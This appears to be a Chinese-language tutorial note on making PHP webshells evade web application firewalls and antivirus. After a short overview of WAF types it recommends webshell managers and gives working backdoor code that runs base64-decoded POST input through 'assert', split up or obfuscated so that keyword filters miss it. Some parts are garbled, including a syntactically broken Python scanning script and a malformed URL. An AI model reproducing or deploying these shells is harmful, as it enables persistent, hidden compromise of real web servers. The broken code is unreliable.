webshell代码免杀

1.什么是WAF?

Web Application Firewal(web应用防火墙)，web应用防火通过执行一系列针对HTTP/HTTPS的安全策略来专门为web应用提供保护的一款产品，基本可以分为以下4种

软件型WAF：以软件的形式安装在服务器上面，可以接触到服务器上的文件，因此就可以检测服务器上是否有webshell，是否有文件被创建等，

硬件型WAF：以硬件形式部署在链路中，支持多种部警方式。当串联到链路上时可以拦恶意流量，在旁路监听模式时只记录攻击但是不进行拦截，

云 WAF：一般以反向代理的形式工作，通过配置后，便对网站的请求数据优先经过WAF主机，在WAF主机对数据进行过涉后再传给服务器

网站内置的WAF：就是来目网站内部的过滤，直接出现在网站代码中，比如说对给入的参数强制类转换，对输入的参数进行敏感词检测

2.工具

推荐：天蝎、哥斯拉

3.脚本后门免杀

（1）php 传参绕过，原理是绕过正则表达式匹配关键函数代码，相当于把关键字的函数代码以参数值发送，不在代码中体现。

<?php
$a=$_GET['a'];
$aa=$a.'ert';
$aa(base64_decode($_POST['X'])):
?>

?a=ass
x=cGhwaW5mbygpOw==

（2）php变量覆盖

<?php
$a='b';
$b='assert';
$$a(base64_decode($_POST['x']));
?>

（3）php加密变异
http://www.phpjm.net
https://www.phpjms.com/
http://1.15.155.76.1234/
思路：将webshell加密，上传过程中则不会被检测出，然后传参时使用参数加密绕过参数检测

（4）php异或运算，无字符webshell
import requests
import time
import threading.queue

def string(
    while not q.empty（）
        filename=q.get（）
        url ='http://127.0.0.1:8081/x/+filename
        datas =
        'x':'phpinfo();'
        result requests.post(url,data=datas).content decode('utf-8')
        if 'XIAODI-PC'in result

（5）php脚本生成器
Webshell-venom

ASP PHP JSP ASPX

使用工具生成php文件后放到Webshell-venom所在位置，使用命令生成脚本免杀